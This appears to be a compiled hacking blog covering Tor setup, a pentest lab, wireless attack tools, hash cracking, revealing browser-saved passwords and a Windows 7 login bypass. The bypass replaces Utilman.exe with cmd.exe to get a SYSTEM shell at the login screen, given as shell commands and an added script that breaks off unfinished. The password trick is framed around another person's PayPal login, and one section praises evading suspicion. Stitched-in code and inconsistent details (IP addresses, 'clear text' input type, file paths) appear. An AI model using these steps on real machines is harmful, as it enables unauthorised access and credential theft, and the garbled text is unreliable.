
How To Setup TOR In Linux

What Is It?:

Tor protects you by bouncing your communications around a distributed network of relays run by volunteers all around the world: it prevents somebody watching your Internet connection from learning what sites you visit, and it prevents the sites you visit from learning your physical location. Tor works with many of your existing applications, including web browsers, instant messaging clients, remote login, and other applications based on the TCP protocol.

Tools Needed:

Download the Tor package and open a terminal in Linux. Type “tar xzf tor-X.X.X.XX.tar.gz” without quotes (note: X.X.X.XX is the version number). Next, change the working directory to the newly extracted folder by typing “cd tor-X.X.X.XX” without quotes and pressing Enter.

The next thing we need to do is configure and build: type “./configure && make” without quotes and press Enter. We are now ready to install and run Tor. After this, type “make install” without quotes and press Enter.

Make sure you have Privoxy. To use the newly installed Tor on Linux, Privoxy must also be present; it does not come with the Linux package as it does with the Mac and Windows packages.

Warnings:

When using Tor there are a few items to consider. First, Tor does not anonymize all Internet traffic when first installed; the only traffic Tor makes anonymous is the traffic from Firefox.

Other applications must be configured to use a proxy before they can use the Tor network. Second, the Torbutton in Firefox blocks technologies that can potentially leak identity.

These include Java, ActiveX, RealPlayer, QuickTime, and Adobe plug-ins. To use Tor with these applications the settings file must be reconfigured.

Third, cookies present before Tor is installed may still give away the identity of the user. To make sure the user has complete anonymity, clear out all cookies before installing Tor.

Fourth, the Tor network encrypts all data only up until the exit router of the network. To fully protect your data, use HTTPS or other trusted encryption.

And fifth, make sure to verify the integrity of all applications downloaded over Tor. Downloaded applications can potentially be a problem if a Tor router is compromised.

 

Thanks for reading, don’t be evil!

Setting Up A Virtual Network For Pentesting

Learning how to hack into systems and networks requires knowledge and understanding of how systems work in the first place, and the best way to learn is by setting up your own private network with systems on it.

This is the way I have learned, and I have found it the most effective way of grasping concepts and thinking about ways of exploitation. We will be covering the following topics:

  • Installing Operating Systems
  • Configuring Network Settings (For Intercommunication)
  • Setting Up Windows Server 2008 (Domain Controller Roles)
  • Adding User Accounts In Active Directory
  • Joining Windows Instances to the Domain

Tools Needed:

  • Virtual Box Found Here
  • Kali Linux 1.0 Found Here
  • Copy Of Windows XP SP3 Found Here
  • Copy Of Windows 7 64bit or 32bit
  • Copy Of Server 2008 Found Here (I recommend using Enterprise Edition.)

Licensing Information:

Virtual Box from Oracle is free for personal use.

Windows XP – Ensure you have the proper product key needed to activate Windows (Or Use Trial)

Windows 7 – Ensure you have the proper product key needed to activate Windows (Or Use Trial)

Server 2008 – Ensure you have the proper product key needed to activate Windows (Or Use Trial)

The first thing we need to do is install our operating systems; we are going to be installing Windows 7, Windows XP (SP3), Kali Linux, and Server 2008. Installation is pretty simple and straightforward in Virtual Box.

For demo purposes we are going to install Windows 7 first, step by step; once you get a handle on the installation of Windows 7, it’s the same for all the other operating systems we are going to install.

 

I. Installing The Operating Systems

Step One: In Virtual Box click on the “New” button to start the process of installing a new operating system. For this blog we are going to be installing XP; the process is the same for each OS. (Shown Below)

VirtualBox

Step Two: Enter a name for the operating system (we are going to use Windows XP Pro SP3), make sure the Type is Microsoft Windows and the Version is Windows XP. After that click Next. (Shown Below)

VirtualBox2

Step Three: We are ready to select the amount of memory we would like to allocate to this instance; set it to 512MB to be on the safe side and click Next. (Shown Below)

*512MB should be okay for each OS; Kali Linux can get by on 256MB. This is on a 4GB Core i5 laptop.

VirtualBox3

Step Four: We are ready to select the type of hard drive we are going to be using on this machine; I just leave it as the default “Create a virtual hard drive now” and press Create. (Shown Below)

VirtualBox4

Step Five: The type of virtual hard drive we are going to select is the default “VDI (VirtualBox Disk Image)”; select that and click Next. (Shown Below)

VirtualBox5

Step Six: Select the directory in which you would like to save the virtual machine instance and also select the size of the virtual hard drive; since this is Windows XP, 10GB should be sufficient. When installing Windows 7 or Server 2008 I recommend at least 25GB for each operating system. (Shown Below)

VirtualBox6

Step Seven: Now that we have pre-configured Virtual Box for Windows XP, it is time to point Virtual Box to our ISO file and boot it up so that we can initialize the Windows XP setup wizard. Highlight the newly created instance and select Settings. (Shown Below)

VirtualBox7

Step Eight: Within the settings page, select “Storage” on the left-hand side and then select the disc with the green plus sign in front of it. (Shown Below)

VirtualBox8 

Step Nine: Select “Choose disk” and browse to the Windows XP SP3 ISO image; it is now mounted as our CD-ROM device in Virtual Box. Now all we need to do is start the instance and we will begin the Windows XP Setup wizard.

VirtualBox9

Repeat this process for all other operating systems you would like to run; these steps are the same for Windows 7, Windows Server 2008, Kali Linux, etc.

II. Network Configuration

We want our operating systems to communicate with one another in our virtualized lab; this can be done by configuring a few settings both within Virtual Box and in the operating systems themselves.

Right click the instance and select Settings, then go to Network. Make sure Enable Network Adapter is checked; next, open the drop-down menu next to Attached to: and choose Internal Network. We also want to specify a name for our virtual network. (Shown Below)

vbnetconfig

Do the same for all of our instances; this will ensure that all of our different systems can talk to one another on the network, just to make things easy for the time being.
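The same lab build expressed as a VBoxManage plan, as an added example that is not part of the original post: it reproduces Steps One to Nine and the Internal Network setting for each VM without the GUI. VBoxManage must be on PATH to execute it; the ISO paths, the VM directory and the internal-network name pentestlab are assumed values.

```python
"""Build the VirtualBox lab from the command line instead of the GUI.

Added example, not from the original post. Assumes VBoxManage is on PATH and
that the ISO paths below exist; with dry_run=True nothing is executed and the
argv lists are only returned so they can be reviewed first.
"""
import subprocess
from pathlib import Path

# Internal-network name is a constructed value; any name works as long as
# every VM in the lab uses the same one (section II).
LAB_NET = "pentestlab"

# (VM name, VBoxManage --ostype id, RAM in MB, disk in MB, ISO path)
# Sizes follow the post: 512 MB RAM (256 MB for Kali), 10 GB for XP,
# 25 GB for Windows 7 and Server 2008. ISO paths are assumed.
LAB_VMS = [
    ("Windows XP Pro SP3", "WindowsXP", 512, 10 * 1024, "/iso/winxp_sp3.iso"),
    ("Windows 7", "Windows7", 512, 25 * 1024, "/iso/win7.iso"),
    ("Server 2008", "Windows2008", 512, 25 * 1024, "/iso/server2008.iso"),
    ("Kali 1.0", "Debian", 256, 10 * 1024, "/iso/kali-1.0.iso"),
]


def plan_vm(name, ostype, ram_mb, disk_mb, iso, vm_dir="/vms", net=LAB_NET):
    """Return the VBoxManage argv lists that reproduce Steps One..Nine and
    the Internal Network adapter setting for one VM."""
    vdi = str(Path(vm_dir) / f"{name}.vdi")
    return [
        # Step One/Two: new VM with the matching Type/Version.
        ["VBoxManage", "createvm", "--name", name, "--ostype", ostype, "--register"],
        # Step Three: memory; boot from DVD first; section II: internal network.
        ["VBoxManage", "modifyvm", name, "--memory", str(ram_mb),
         "--boot1", "dvd", "--boot2", "disk",
         "--nic1", "intnet", "--intnet1", net],
        # Steps Four..Six: VDI disk of the chosen size.
        ["VBoxManage", "createhd", "--filename", vdi, "--size", str(disk_mb),
         "--format", "VDI"],
        ["VBoxManage", "storagectl", name, "--name", "IDE", "--add", "ide"],
        ["VBoxManage", "storageattach", name, "--storagectl", "IDE",
         "--port", "0", "--device", "0", "--type", "hdd", "--medium", vdi],
        # Steps Seven..Nine: mount the install ISO as the CD-ROM device.
        ["VBoxManage", "storageattach", name, "--storagectl", "IDE",
         "--port", "1", "--device", "0", "--type", "dvddrive", "--medium", iso],
    ]


def build_lab(vms=LAB_VMS, dry_run=True):
    """Plan every VM in the lab; run the commands unless dry_run. Returns the plan."""
    plan = {name: plan_vm(name, *rest) for name, *rest in vms}
    if not dry_run:
        for cmds in plan.values():
            for argv in cmds:
                subprocess.run(argv, check=True)
    return plan


if __name__ == "__main__":
    for vm_name, cmds in build_lab().items():
        print(f"# {vm_name}")
        for argv in cmds:
            print(" ".join(argv))
```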

 

III. Setting Up Server 2008 Server Roles

I am going to assume you know how to set up a default 2008 server system; we are going to cover installing and configuring the Roles, which includes Active Directory Domain Services and DHCP services. It’s going to be our domain’s authentication / security / IP handling server.

*Make sure you remember the administrator credentials you set while installing 2008 Server Enterprise; you will need them later to join our hosts to the domain.

Step One: Click Start and select Server Manager. Inside the Server Manager, right click on Roles and then select “Add Roles”. You will then get an Add Roles window; select Active Directory Domain Services. (Shown Below)

addroleswindow

 

Only Active Directory can be installed by itself, so do not try to install DHCP along with it; it won’t let you proceed past this point. Click Next, Next and then Install. (Shown Below)

ADinstall

Once complete, Server 2008 will reboot and Active Directory will be installed. Now we need to repeat the same process and install DHCP this time around. DHCP will allow our other OS instances to get IP addresses from our Server 2008 machine. (Shown Below)

dhcpinstall

You will get a message about the server not detecting a static IP being assigned; ignore this for now and continue, we will assign a static IP address afterwards. It will ask us to provide a top-level domain; name this whatever you’d like your domain name to be. Also provide it with the DNS IP address 10.1.10.1; we will assign our server this IP address statically so it never changes. (Shown Below)

DNSnew

Next you will be asked if anything is using WINS on the network; choose No and click Next. We then need to provide our DHCP scope; for our lab we are going to set our scope from 10.0.0.1 – 10.255.255.254 with a subnet mask of 255.0.0.0. This is a standard Class A network that most enterprise-class Cisco routers use.

newCope

It will ask you about IPv6 Stateless mode; make sure to DISABLE it as we will not have any IPv6 clients right now. Once finished we will have a summary screen, and it should look something like this. (Shown Below)

Summary

IV. Assigning Static IP Addresses

It’s important to assign a static IP address because if we are going to be using this server as a Domain Controller, all the hosts that authenticate to the domain will always need to be able to reach it. Assigning a static IP address does just that.

Step One: Go to Control Panel and into Network Connections; from there select your network interface card, right click it and select Properties. (Shown Below)

StaticIP

Step Two: Select Internet Protocol in the window and select Properties; in there we need to configure a few settings. Make sure “Use The Following IP” is selected and plug in the settings shown below.

IPsetting

Click OK and reboot the server. As you can see we are assigning an IP address of 10.0.0.1 with a subnet mask of 255.0.0.0 and DNS pointed at 10.0.0.1. That’s it for assigning static IP addresses; this is the same in Windows 7 and in Windows XP.

 

V. Running DC Promo & Configuring AD

We need to promote our 2008 Server into an actual domain controller, ready to authenticate our users and computers to the domain. The first thing we need to do is click Start, type “dcpromo” without quotes and press Enter. This will begin the wizard for setting up our Active Directory structure.

Click Next until you get to a window asking if you want to join an existing domain or create a new one; select create a new domain in a new forest and press Next. (Shown Below)

ADNewForest

Next the wizard is going to ask at what functional level we want this DC to operate. We don’t have any legacy domain controllers or software, so we can just use Windows Server 2008 and click Next. (Shown Below)

FFL

 

Click Next through the menus and then set a Recovery Mode password in case there is a disaster in the future. (Shown Below)

RestorePassword

 

One last reboot will be required, but now we have a brand new domain controller and our very own virtual domain to fuxx with! Now we need to add user accounts so our hosts can authenticate to the domain.

 

VI. Adding Snap-Ins / Adding User Accounts To Active Directory

We need to customize our Microsoft Management Console; this is the console used to navigate to the different services running on the server and make changes if necessary.

Click Start, type “mmc” without quotes and press Enter. This will open up the Microsoft Management Console. Once inside, select File at the top and select “Add Snap-Ins”. (Shown Below)

snapins

 

We are going to add 3 Snap-Ins: Active Directory Users And Computers, DHCP, and DNS. Highlight them and click Add; they will then be added to the right column. Click OK. (Shown Below)

SnampIns2

Your MMC console should look like the one shown below; we are going to be adding users now.

Snapins3

 

Click the plus sign next to Active Directory Users and Computers, then click the plus sign next to our domain (nullsetcomputerco.com in our case). After that go down to Users, right click, hover over “New” and then select User. (Shown Below)

AddUser

Add the name of the user and the login credentials you want them to use to authenticate to the domain. We are going to use Tom Hanks as an example. (Shown Below)

UserAddTom

Click Next and then set a password for the new user; we haven’t specified a password strength policy for our DC so it doesn’t have to be complex. Make sure to uncheck “User has to change password”. (Shown Below)

NewUserpassword

Again click Next; now our user is set up on the domain and we are ready to join our other instances to the domain controller.

 

VII. Joining Windows Instances To The Domain

We are finally ready to add our computers to the domain. Let’s go over to the Windows XP instance and join it to the domain. (The Domain Controller instance must be running!)

The first thing we want to do is make sure that our Windows XP instance can communicate with our domain controller on the network. Open up a command prompt and ping 10.0.0.1, the IP address we statically assigned to our server. We are getting replies from the server, so that is a good sign. (Shown Below)

DCPing

After we have verified we have connectivity between the two operating systems we can proceed to the next step. Right click on My Computer and go to Properties; once open, navigate to the Computer Name tab, click Change and enter the domain name that you set up in Server 2008 (nullsetcomputerco.com for this example). Enter the Administrator username and password for the Domain Controller, not the local machine. (Shown Below)

Namechanges

Once you have entered the correct credentials you will be greeted and welcomed to the domain. (Shown Below)

Welcome

That’s it! Now just repeat the same steps for your Windows 7 instance so that it can log in to the domain. (You can add users to the Domain Controller for Windows 7.)

 

Note: We can also download firewall distributions like pfSense to install and configure on our network if we want to make it more authentic; we could also set up an Apache web server or SQL server to exploit in the future.

Thanks for reading don’t be evil!


Introduction To Aircrack NGUI

What Is It:?

Aircrack-NGUI is a combination of the words “Aircrack-NG” and “GUI”. In short, it’s a program written in Java that provides a graphical interface to many hacking tools available for the GNU/Linux operating system. At the core of these tools lie the Aircrack-NG suite (airodump-ng, aircrack-ng, aireplay-ng, etc.), Nmap (Network Mapper), and the Dsniff suite (arpspoof, dsniff, mailsnarf, urlsnarf, etc.).

Aircrack-NGUI was designed for people who either aren’t very skilled when it comes to using the terminal or those who don’t type very fast but still want to hack quickly. The developer of Aircrack-NGUI also has plans for it to be a learning and scripting tool, so that you can perform your hacking in the program but then save the program calls and arguments it uses to a text file for you to review and learn from or convert to a script.

Tools Needed:

  • Distribution Of Linux (Ubuntu, Kali etc)
  • Aircrack NGUI Found Here

Why Should You Use Aircrack NGUI?:

Aircrack-NGUI provides many benefits to hackers, not just from its graphical nature. It allows you to save commonly used “profiles” in the program so you can save configurations and pull them up quickly. For example, on the Discover Networks screen, you can have a profile for capturing WEP network information.

Whenever you need to capture, you can select the profile instead of remembering all of the arguments that you need to set. Also, NGUI is really proficient at sending information from screen to screen. If you want to de-authenticate client computers on a network using airodump-ng (find the network) and aireplay-ng (attack the network), you can use the Discover Networks screen to find the network, right-click the network in question, and click “De-authenticate” and it will load a Replay/Inject Packets screen with the right information populated.

So it’s select, right-click, attack, GO. The need for copying and pasting has been minimized as much as possible within the program. Finally, you get the comfort of a graphical interface behind you. Many hackers enjoy the terminal because it lets them choose exactly what they want and is customizable. The problem is that many non-hackers will view the terminal (black box, white text) as hacking and might report you just for having that magical box open. Not many users question a GUI, no matter if they know what it does or not.

How do I use Aircrack-NGUI?:

In order to use Aircrack-NGUI, you must first be running a Linux-based operating system. This includes (but is not limited to) Ubuntu (and all of its variants), Fedora, BackTrack 5, and Kali. (Note: Compatibility with Kali has not been tested yet. Try with caution.) It doesn’t matter if you’re running it from your hard disk or from a LiveCD. Once you have your Linux system loaded, go to the link above and click on the Downloads tab. Download the first zip file in the list and extract it to one of your folders. Open up a terminal and change into the directory with the extracted files. From there, type:

In Ubuntu:

sudo java -jar AircrackNGUI.jar

In Fedora:

su -c 'java -jar AircrackNGUI.jar'

In BackTrack 5/Kali:

java -jar AircrackNGUI.jar

You will need the Java Runtime Environment (JRE) installed in order to run the software. From there, the program will launch and display the following:

NGUI1

This is the main window of Aircrack-NGUI. The menus at the top allow you to select which tool you want to use.

A list of your registered network devices will appear on the left side of the screen. If you select a device, its information will appear on the right. If you click on a setting title, it will prompt you to change it. You can also copy the values to your clipboard using the Copy To Clipboard drop-down.

You can save your configuration settings to a file using the “Save to Config…” button. Finally, to create a virtual monitor mode interface click “Create Monitor Interface” (requires aircrack-ng installed and configured!). To destroy a monitor-mode interface, click “Destroy Monitor Interface”. (Shown Below)

NGUI2

From this point, you have the program setup and hardware configured for some wireless destruction! Here’s a breakdown of your different options:

  • Discover->Discover Networks: Combines airodump-ng and wash to find wireless networks and which ones are vulnerable for WPS pin guessing (used alongside Reaver).
  • Discover->Discover Hosts: Allows you to scan a network or a specific IP for open ports and networking information.
  • Discover->Graph Network: Create a graphical representation of a network using airgraph-ng.
  • Discover->WPA Dictionary: Create a dictionary to speed up the cracking of WPA handshakes

Greyed-out menu options mean that you don’t have the appropriate programs installed to use the feature, or the feature hasn’t been developed yet (most of these are under the Other Tools dropdown). If you have a program installed but it’s greyed out, use the Settings page (Setup->Settings).

clip_image002

If you’re using BackTrack 5, click the “Default BT5 Settings” button and the settings will auto-populate to match that configuration. If you’re on another system, you’ll need to set the settings yourself. If you added the program to your path variable leave it at “IN PATH”. If it’s in a specific directory, change it to “DIRECTORY” and a textbox will appear for you to provide the path. Once you have your settings configured, click “Save”.

Click on Setup->Network Devices to configure your hardware for hacking.

  • Attack->Replay/Inject Packets: Send packets to routers to force them to spill the goods!
  • Attack->Crack WEP/WPA Key: Take captured network information to find the password to a network
  • Attack->Forge Packets: Create new packets from packets captured
  • Attack->ARP Poison Routing: Perform a man-in-the-middle attack with ease using arpspoof
  • Attack->Sniff Passwords: Sniff passwords from a victim machine from a man-in-the-middle attack.

And that’s just the beginning! There are more tools available under the Other Tools dropdown and in context menus of the above listed features.

Conclusion:

Aircrack-NGUI is a great tool for those who need an inconspicuous, fast tool with lots of room for learning and improvement. Not to mention, it’s free to use and re-distribute! If you have a recommendation for the writer, feel free to create an Issue on his Bitbucket repository page.

Thanks for reading, don’t be evil!

Who is Sabu?


Sabu is infamous across the internet for his hacking ability and the fact that he eventually became an FBI informant, turning against those who he used to work with. He is notorious for his attacks on both US and Zimbabwean governments, along with a massive list of others.

He was eventually identified as Hector Monsegur on the 11th of March, 2011 in a publication known as Nameshub. Somebody known as “The Jester”, who had vowed to reveal the actual names and identities of the LulzSec staff, wrongly identified him first as an IT consultant based in Portugal, and then as another IT consultant called Xavier Koatico.

After Sabu was identified online, The Jester then helped confirm that Mr. Monsegur was in fact Sabu.

In early 2012, “Sabu” was identified as 28-year-old Hector Xavier Monsegur, who was unemployed and was foster parent to two children. A non-graduate of Washington Irvine High School, he stayed in his recently deceased grandmother’s house in Riis, New York.

Arrested by the FBI in June 2011 in his apartment following “Operation Payback” – a host of attacks made on PayPal, Visa and MasterCard – he shortly after agreed to become an FBI informant, still under the guise of “Sabu”. In a bail hearing in August 2011, Assistant US Attorney James Pastore announced that “Sabu” had been working non-stop with the government to help it catch other hackers.

In his involvement with “Operation Payback” he acted as a “rooter”, the one who would go in and find the chinks in the armor of the website they intended to attack. He spent time working out where it would be easiest to hurt the above websites, and left it to his “Hacktivists” – the people who did the hacking for him – to swoop in.

Shortly after this bail hearing however, “Sabu” pleaded guilty to twelve separate charges, including several counts of conspiracy to engage in hacking, and aggravated identity theft. For these crimes, he faces a possible sentence of 124 years.

During his time as an informant, he passed on information about several other hackers who were associated with LulzSec and AntiSec; he also assisted in the arrest of James Jeffery and Ryan Cleary of the United Kingdom. Cleary was charged with involvement in denial of service attacks on SOCA, as well as other websites.

“Sabu” kept up his pretense to be against the law for a long time after his co-operation began, even tweeting as late as March 2012 that he was “opposed” to government activity. However, on the 6th of March 2012 – the day of his last tweets as “Sabu” – there were five arrests made, two from the United Kingdom, two from Ireland and a USA citizen.

He was also used in the attempt to catch Nadim Kobeissi, who was the creator of Cryptocat, but this proved fruitless.

In August 2012, the Federal Government won a delay of six-months in the case against “Sabu” as he was, at that time, still involved with the law. He is now scheduled for the 22nd of February 2013.

Goodbye Backtrack, Hello Kali Linux 1.0! – A Brief Walkthrough

It looks like the development team over at Offensive Security will not be releasing a Backtrack 6, but are introducing a new more mature and polished product.

Enter Kali Linux 1.0 touting over 300 tools and a complete UI overhaul, it looks very clean and minimalistic. It was in secret development for years and has finally been released.

It’s running Debian XFCE. If you are interested in getting a copy, it can be found Here. It comes with GViM as the default text editor and Iceweasel as the default web browser.

Here is a shot of the new desktop interface (Shown Below) You may click for a larger preview!

DesktopKali

Let’s take a look at some of the new tools and menus that have been added. The first thing you will notice is all the standard applications and accessories that you would expect to come pre-installed. (Shown Below)

Accessories

Underneath Accessories we have Electronics; this appears to contain the Arduino IDE for development and, I’m sure, tinkering with Arduino boards. Pretty sweet! (Shown Below)

Electronics

Moving right on down the list we have Graphics; this has your standard Document Viewer and Image Viewer. (Shown Below)

Graphics

Alright, enough with the boring stuff; let’s now take a look at some of the new menus and tools that come with Kali Linux. The first thing we will notice under “Kali Linux” is a new menu called “Top 10 Security Tools”; as you would expect it contains tools like Aircrack, Hydra, Metasploit, Wireshark, SQLMap, etc. (Shown Below)

Top10

Just below that we have Information Gathering with all kinds of different sub-categories: SMB Analysis, DNS Analysis, IDS/IPS Identification, just to name a few. I’m not going to screenshot every sub-menu as it would take forever. (Shown Below)

InfoGathering

Moving right on down the list is Vulnerability Analysis; this has tools for finding vulnerabilities in things such as databases, Cisco equipment, scanners, etc. (Shown Below)

vulnanalysis

I’m not going to go through every sub-menu like I said before, but I did want to show you something new. We have Hardware Hacking now; this covers both Android and Arduino, so we now have tools to hack into Arduino boards and Android phones! (Shown Below)

Hardware Hacking

I hope you enjoyed reading this brief walkthrough of the new Kali Linux 1.0 and as always don’t be evil!

I would also like to note that while running the new OS I tested a few different wireless cards, including a NetGear and an ALFA Networks wireless card; both worked without a hitch. Overall the new OS seems stable and responsive, very good for a 1.0 release.

Online Hash Cracking In The Cloud With Cloud Cracker

What Is It?:

Cloud Cracker is an online password cracking service for penetration testers and network auditors who need to check the security of WPA protected wireless networks, crack password hashes, or break document encryption.

This is really an excellent idea, and it was only a matter of time until someone thought of cracking passwords in the cloud. Yes, it does cost a little bit of change, but you are getting a lot for your money in my opinion :)

Tools Needed:

This website is extremely easy to use: simply open a browser and go to https://www.cloudcracker.com/; once you are on the website you will be presented with an upload box. (Shown Below)

CCMainPage

To begin, simply select the type of hash you are trying to crack, whether that be WPA, NTLM or even MD5; it supports quite a few different hash and encryption types, even MS-CHAPv2 for cracking Point-to-Point Tunneling Protocol (PPTP). (Shown Below)

encryptiontypes

After we have selected the type of hash we are going to crack, we simply need to upload the hash dump file that we have. Click “Choose File” and find your hash dump file. For demo purposes we are going to use an NTLM hash dump from a domain controller. (Shown Below)

Choosefile

Cloud Cracker will tell you if your hash dump file is not in the correct format; the hash dump should look like this for Windows Vista and later: Administrator:500:NO PASSWORD*********************:0CB6948805F797BF2A82807973B89537::: After the file has been uploaded simply click Next. You will then be greeted with the Dictionary screen. (Shown Below)

dictionary options

At the dictionary screen select “Default” and press Next. Now we’re pretty much done; the last screen will ask you to input your email address (so they can send you the results) and finally the payment information page. I was able to crack a single hash dump for $5 in about 10 minutes! I hope you enjoyed reading this blog and as always, don’t be evil!
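Before uploading a dump it is worth checking it yourself; the following is an added example, not code from the original post or from Cloud Cracker, that parses the pwdump-style format quoted above (user:RID:LM hash:NT hash:::) and flags accounts that deserve attention: empty passwords, and accounts that still store an LM hash (which is case-insensitive and cracked in two 7-character halves). The sample dump is constructed; only the Administrator line is the format line from the post, and the account names and the remaining hash values are sample values.

```python
"""Validate a pwdump-style NTLM hash dump and report weak entries.

Added example, not from the original post or from Cloud Cracker. The sample
dump is constructed: the Administrator line is the post's format line, the
other hashes are sample values.
"""
import re

HEX32 = re.compile(r"^[0-9a-fA-F]{32}$")
# pwdump writes this 32-character placeholder when no LM hash is stored.
LM_PLACEHOLDER = "NO PASSWORD" + "*" * 21
# Well-known hashes of the empty password (LM and NT respectively).
LM_EMPTY = "aad3b435b51404eeaad3b435b51404ee"
NT_EMPTY = "31d6cfe0d16ae931b73c59d7e0c089c0"

SAMPLE_DUMP = "\n".join([
    # The format line quoted in the post (Windows Vista and later).
    f"Administrator:500:{LM_PLACEHOLDER}:0CB6948805F797BF2A82807973B89537:::",
    # Constructed: NT hash of the empty password.
    f"Guest:501:{LM_PLACEHOLDER}:{NT_EMPTY}:::",
    # Constructed: LM storage disabled, only an NT hash present.
    f"legacy.svc:1104:{LM_EMPTY}:0123456789abcdef0123456789abcdef:::",
    # Constructed: LM hash present; second half is the empty-half constant,
    # which means the password is 7 characters or fewer.
    f"old.user:1105:0123456789abcdef{LM_EMPTY[16:]}:fedcba9876543210fedcba9876543210:::",
    "broken line without fields",
])


def parse_pwdump_line(line):
    """Return (user, rid, lm, nt) or raise ValueError for a malformed line."""
    parts = line.rstrip("\n").split(":")
    if len(parts) < 4:
        raise ValueError(f"expected user:rid:lm:nt:::, got {line!r}")
    user, rid, lm, nt = parts[:4]
    if not user or not rid.isdigit():
        raise ValueError(f"bad user or RID in {line!r}")
    if lm != LM_PLACEHOLDER and not HEX32.match(lm):
        raise ValueError(f"LM field is neither 32 hex chars nor the placeholder: {lm!r}")
    if not HEX32.match(nt):
        raise ValueError(f"NT field must be 32 hex chars: {nt!r}")
    return user, int(rid), lm.lower(), nt.lower()


def audit_dump(text):
    """Classify every line of a dump.

    Returns {"errors": [messages], "accounts": {user: [findings]}}; errors
    are what Cloud Cracker would reject as a wrong format."""
    report = {"errors": [], "accounts": {}}
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        try:
            user, rid, lm, nt = parse_pwdump_line(line)
        except ValueError as exc:
            report["errors"].append(f"line {lineno}: {exc}")
            continue
        findings = []
        if nt == NT_EMPTY:
            findings.append("empty password")
        if lm not in (LM_PLACEHOLDER.lower(), LM_EMPTY):
            findings.append("LM hash stored (case-insensitive, crackable in halves)")
            if lm[16:] == LM_EMPTY[16:]:
                findings.append("password is 7 characters or fewer")
        if not findings:
            findings.append("NT hash only")
        report["accounts"][user] = findings
    return report


if __name__ == "__main__":
    result = audit_dump(SAMPLE_DUMP)
    for err in result["errors"]:
        print("REJECT", err)
    for account, notes in result["accounts"].items():
        print(f"{account}: {', '.join(notes)}")
```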

Reveal Credentials That Have Been Saved At Login Screens

Today I am going to show you a simple trick to reveal hidden passwords that have been saved on a computer. A lot of people have the web browser remember their credentials for convenience; with just a few simple steps we can reveal what the saved password is. Let’s take a look.

Tools Needed:

  • Web Browser With Debugging (Chrome Or FireFox)

The first thing we need to do is find a page where credentials are stored in the browser; for this blog we are going to use PayPal as an example. (Shown Below)

paypallogin

As we can see, this user has saved their credentials in the web browser so that they can simply log in, but what if we needed to know what that password was? Maybe they use the same password for all of their other logins? The first thing we want to do is right click in the password field and select “Inspect Element”. (Shown Below)

InspectElement

Once we are in the debugging console in Google Chrome we are going to look at a specific section of the code that comes up; it looks like this: <input type="password" id="login_password" name="login_password" (Shown Below)

password

We are going to simply double click the “password” value next to <input type= and enter “clear text” without quotes, then press Enter. (Shown Below)

cleartext

After we hit Enter the browser will show the hidden password, revealing it in clear text. (Shown Below) This should work for all saved passwords in login fields.

cleartextshown

I hope you enjoyed reading this blog, and as always don’t be evil!

Fun With Physical Access To Windows 7 Machines (Bypassing Login)

Today I am going to show you a clever little trick that can be used on Windows 7 machines; this type of exploit only works if you have physical access to the computer you are trying to compromise. It requires knowledge of a few basic Linux commands and just a minute or two of time.

Tools Needed:

To begin I will explain what makes this exploit possible. Windows 7 has a feature installed called “Ease of Access”; this utility can be launched by pressing the Windows Key + U. The utility works and can be activated on the computer even if a user is not logged in or has locked their workstation. (Shown Below)

EOA

First you will need to power down the workstation, insert your Backtrack DVD or thumb drive and get into the boot menu of the computer (almost always the F12 key). Once we are booted up inside of Backtrack, let’s open up a terminal and take a look at the Windows directories on the local machine. Type “fdisk -l” without quotes and press Enter. (Shown Below)

fdisk

This will give us a list of all of our disks; for this demo we are focusing on the NTFS file system, since this is a Windows 7 machine, and it is shown as “hda1”. Let’s go into our mount folder: type “cd /mnt” without quotes and press Enter. After that, in our mount folder we are going to make a directory called hda1 just to keep things simple. Type “mkdir hda1” without quotes and press Enter.

Now we want to mount the /dev/hda1 drive into the newly created directory. Type “mount /dev/hda1 /mnt/hda1” without quotes and press Enter. The Windows file system is now accessible in our new directory; if we type “ls” without quotes we will see all of the Windows files in that directory. (Shown Below)

Untitled-2

The Ease of Access utility is called “Utilman.exe” and it resides in the system32 folder. Type “cd system32” without quotes and press Enter. Now that we are in the system32 directory we need to type “mv Utilman.exe Utilman.old” without quotes and press Enter.

The command prompt lives in this same directory, so we copy it over, replacing Utilman.exe with cmd.exe. Type “cp cmd.exe Utilman.exe” without quotes and press enter.

That is every change we need. Leave the directory and unmount the partition so the writes are actually flushed to disk: type “cd /” and then “umount /mnt/hda1” without quotes. Then reboot: type “reboot” without quotes and press enter. Now the fun part comes when we are presented with the Windows 7 login screen again.

All we need to do is press Windows Key + U, and instead of Ease of Access we are greeted with a command prompt running as NT AUTHORITY\SYSTEM (type “whoami” to confirm). From there we can run explorer.exe and get a fully functional desktop and task bar. (Shown Below)

[Screenshot: SYSTEM command prompt and Explorer on the login screen]

Two things to remember when you use this on an engagement: put Utilman.exe back when you are done (boot the live CD again and move Utilman.old back over it), and note that full-disk encryption such as BitLocker, or a firmware password with a locked boot order, stops this trick before it starts. That’s it, I hope you enjoyed this blog, and as always don’t be evil!    ** Note: I had to take a picture of the desktop at a client’s when I was testing the exploit. **
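As an added example (not part of the original post and not the author’s code), here is the live-CD half of the procedure as a small bash script with the checks the step-by-step commands skip: it verifies that the partition you mounted really holds a Windows install, refuses to overwrite an existing Utilman.old so the original can always be restored, and includes the restore function for putting the machine back after the engagement. The device name, the /mnt/hda1 mount point and the file layout are assumptions.

```bash
#!/bin/bash
# Added example, not from the original post. Swaps cmd.exe in for Utilman.exe on a
# Windows partition mounted from a live Linux (BackTrack in the post) and puts it back
# afterwards. Run as root. Device names and the /mnt/hda1 mount point are assumptions.
set -u

# is_windows_root DIR: true if DIR is the root of a Windows install (has the two
# files we are about to touch). Catches mounting the "System Reserved" partition.
is_windows_root() {
    [ -f "$1/Windows/System32/cmd.exe" ] && [ -f "$1/Windows/System32/Utilman.exe" ]
}

# mount_windows DEV DIR: mount the NTFS partition read-write with ntfs-3g. The mount
# fails if Windows was hibernated rather than shut down (dirty volume), which is the
# most common reason the later swap silently does nothing.
mount_windows() {
    mkdir -p "$2" && mount -t ntfs-3g -o rw "$1" "$2" && is_windows_root "$2"
}

# swap_utilman DIR: keep the original as Utilman.old and copy cmd.exe over Utilman.exe.
# Refuses to run if Utilman.old already exists so the backup is never overwritten.
swap_utilman() {
    local sys32="$1/Windows/System32"
    is_windows_root "$1" || { echo "no Windows install under $1" >&2; return 1; }
    if [ -e "$sys32/Utilman.old" ]; then
        echo "Utilman.old already exists under $sys32; already swapped?" >&2
        return 1
    fi
    mv "$sys32/Utilman.exe" "$sys32/Utilman.old" || return 1
    cp "$sys32/cmd.exe" "$sys32/Utilman.exe"
}

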